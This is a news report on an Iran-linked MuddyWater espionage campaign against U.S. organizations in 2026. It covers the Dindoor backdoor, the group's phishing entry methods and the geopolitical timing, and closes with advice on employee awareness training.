Cyber security researchers at Threat Hunter Team say a long-running Iranian cyber espionage group has breached several U.S. organizations in a campaign that began earlier this year and has continued even as geopolitical tensions escalate.
The activity has been linked to MuddyWater, an Iran-aligned advanced persistent threat group believed to operate under the country’s Ministry of Intelligence and Security. The hackers are known for cyber-espionage operations that focus on gaining persistent access to networks and collecting sensitive data from government and private sector targets.
The campaign began in early February 2026
Researchers first observed the latest wave of activity in early February, when attackers began infiltrating networks belonging to several U.S. organizations across different sectors. Investigators say the group managed to establish a foothold in multiple environments, including companies linked to banking, aviation, and the Israeli operation of a software development service.
According to a blog post published on the 5th of March 2026, the campaign appears to focus on stealthy access. In several cases, the attackers maintained hidden persistence inside corporate networks, giving them the ability to gather intelligence and move deeper into systems over time.
Backdoor malware used to maintain access
Once inside a network, the operators deploy a new custom backdoor known as Dindoor, which allows them to communicate with compromised systems and issue commands remotely. The malware is designed to merge with legitimate traffic, helping attackers maintain long-term access while avoiding detection.
In many cases, attackers use stolen credentials, legitimate remote administration tools, or built-in Windows utilities to move across systems after the initial compromise. That approach shows a pattern seen in earlier MuddyWater campaigns, where the group prioritizes persistence and reconnaissance over immediate disruption.
Phishing and social engineering remain key entry points
While AI-based attacks are on the rise, email-based attacks still remain one of the most common ways the group gains entry. In previous operations, MuddyWater distributed malicious documents through spear-phishing emails that encouraged recipients to enable macros or download seemingly legitimate files. Once opened, those documents could install malware or launch additional payloads.
This attack technique has continued to work because it targets employees rather than technical vulnerabilities. By impersonating trusted senders or using realistic themes, attackers can persuade victims to open attachments or click on malicious links.
Attacks continue despite geopolitical escalation
What makes the campaign notable is its timing. The activity has continued even after recent military strikes involving the United States and Israel, a period when security analysts often expect cyber retaliation or intelligence-gathering operations from Iranian-linked groups.
Iran has long treated cyber operations as a strategic tool to gather intelligence and pressure adversaries without direct military confrontation. Previous campaigns have targeted industries such as energy, telecommunications, transportation, and government agencies around the world.
Companies are advised to train employees to recognize and respond to common cyberattack tactics, especially suspicious emails or phone calls where attackers impersonate trusted individuals or organizations. Regular awareness training can help staff verify requests, avoid sharing sensitive information, and report unusual communication before it leads to a compromise.
